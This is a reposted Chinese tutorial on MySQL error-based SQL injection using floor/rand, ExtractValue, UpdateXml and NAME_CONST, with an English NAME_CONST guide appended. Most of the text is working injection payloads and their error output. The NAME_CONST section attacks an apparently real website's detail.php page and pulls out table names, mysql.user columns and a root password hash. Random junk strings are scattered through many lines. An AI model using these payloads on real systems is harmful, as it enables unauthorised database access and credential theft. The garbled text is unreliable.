mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
6 N7 A: f+ O; J首先进行正常查询：

mysql> select * from article where id = 1;
4 F& o( v5 s8 K: i) q! R+—-+——-+———+
8 q% D$ ^) h/ |( d3 `| id | title | content |
# E0 [1 K) `3 x0 K+—-+——-+———+
! v+ ?- y9 C' @% ?4 F1 I( I; C|  1 | test  | do it   |
) G  K$ @9 o, L# c* E+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
+ }9 L$ k9 ^1 M* K+ H% x: ?6 O5 zERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
4 @/ c& L& c0 u9 B7 c例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
  v& v  V  [4 x+ SERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

4 R/ q9 v+ h* Z4 L/ |# d! y: q2 f
3 e- E0 E# F( Q. K

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

- }- r) p; k5 N5 V- Y, bErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
- [8 ]% g3 x1 r4 o  u4 i
MYSQL高版本报错注入技巧-利用NAME_CONST注入
1 T" [# ]- ?2 \% x% V6 [' o* ^It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

* ^1 z- Y1 p; L% h3 t
* F+ ]# a* N+ k$ i相关信息
+ J5 U9 a2 ?* @$ Y3 t; J  b& V. J
  ]: u) q$ L7 y' n* ]NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
  E. e8 j+ ~& x
Code:
( S5 J$ W4 a5 s% oNAME_CONST(DATA, VALUE)
7 e% @' p+ v+ E- D# `* m. N
) U2 }6 T( M1 y& Q4 \Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
7 M; B; e3 i" L, r; H* e1 _9 c
SELECT NAME_CONST('TEST', 1)

5 o. `) Z  s6 Q8 D- U& L
! _6 g- {/ k: H5 ~; x8 i
" Z, Q$ |$ S( `: [/ B6 x|---------------|
' o+ N" K) d6 U4 z$ X5 @|     TEST      |
|               |
* K" O: `* ?6 V) b; y2 C* j" e1 s|---------------|
5 r* T! B, d3 s0 O|       1       |
|               |
|---------------|
- \7 h* y/ V) i: \' A& ^
6 I7 j: z+ q6 q6 q
0 |6 V+ k. W4 T0 \  f0 V

6 |$ l0 N; M$ ~) E. n5 Khttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
2 f* l5 K8 L5 N  |, P; a' j9 cIntro to MySQL Variables

Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
+ a5 g8 Q7 o$ X" H+ X/ C
Code:
* s9 t3 ~% r! Khttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261

( R, p4 ], W+ Y0 w3 G5 S


* q7 f" K  h2 L* Z- q: f
- o0 E' t2 q# p: l" |% JCode:
1 j+ `- w" E/ D+ L- D! Gand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
9 R# k( k5 a% [1 k7 o+ l9 G( b
" H( s% V+ p. A  y
VAR = Your MySQL variable.
5 A8 z3 ^- e# m% s, ]
( \) R6 y! D% N4 FMySQL 5.1.3 Server System Variables
4 k- o1 z. Q  A9 c. w8 E7 m3 y. A
Let's try it out on my site..
' I; V- d' _7 ]
Code:
4 I) T; }+ A, C" N2 `  n- m+ Yhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

2 G+ [" q. u( bErroruplicate column name '5.0.27-community-nt'
1 m# y# O7 }5 Z7 {; a# @  u

3 z3 ]; Z2 t; q7 @
- u. X1 H0 k% @9 X, J3 C( a1 L
0 M3 y+ u* ~& C& ~5 ?0 {
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction
" k2 \4 a% B  v1 S+ N2 f$ N
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
4 O- P3 @9 w  y# ^
3 d; h+ @4 N3 E7 ^, u
- {6 |3 G5 H! Q0 x3 WWe should get a duplicate column 1 error...
8 F3 K! I6 m+ O% q0 @
; C0 E7 o% M+ C# y1 x, |% ^Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
5 N; A# ?" e& H; \7 U7 M  T% a
) L. i* N* {. Y( z' B' ~/ \7 VErroruplicate column name '1

* k& h, M1 ?" v5 ~. y" l0 q  ~! ~7 i, }

2 F; h. p% Z* P
" q& t4 P- R& F' S( d# S7 z/ S

, E( P- R! M/ _# L# Y. [Now let's get the tables out this bitch..
2 Z0 t+ j  k# M! ^: _
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
9 \/ D  L+ q( n2 s% z5 f

Let's see if it works here, if it does, we can go on and finish the job.

( b6 p! w' n( E6 [2 M  X; ], W) [5 A' XCode:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
2 J1 k- K5 q3 \( R
# J5 G1 K& X, g  A7 R, o
& g2 V% |4 M. w. j% TErroruplicate column name 'com_admanage
( ^4 h. E1 G' y


  ?5 j% Q1 E; B
6 |0 c  e, P4 N/ T- J& e

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

- b3 i# ]2 E' mCode:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--


$ r; ~: p6 I: l  \- u& i  N) nSo mine looks like this, and I get the duplicate column name 'Host'.
* Z/ g3 q7 u/ W  I
2 t! s3 m- a- t% pCode:
9 _% N1 F/ C( }% `- c$ ]http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Erroruplicate column name 'Host'
6 J# {+ ?% b& l9 n
$ F; O' F+ f! {. s: f
5 ]7 d7 i8 R: \9 ]1 D* `2 W* s  B5 s
8 x6 D4 ^' j; C

+ q7 f" ]8 k0 F) J: t4 i  L
Woot, time to finish this bitch off.
1 t) _3 V8 O3 [1 U; r0 i
Code:
3 R& t9 s6 R: ]* q- {! F* L; m7 a; [+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

% ?  D0 |% ]" J+ p0 r
So mine looks like this...
  Y! a/ }1 W3 X- ~# I
7 Y1 F. L% C1 _/ U4 MCode:
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

5 B! ]6 n" g$ GErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

7 f, b7 i# E; t0 u* _
' T8 q- m* t& g3 G
. G/ W8 S; u1 t


And there we have it, thanks for reading.
# }+ _' Q7 U( }# x9 |( M' Q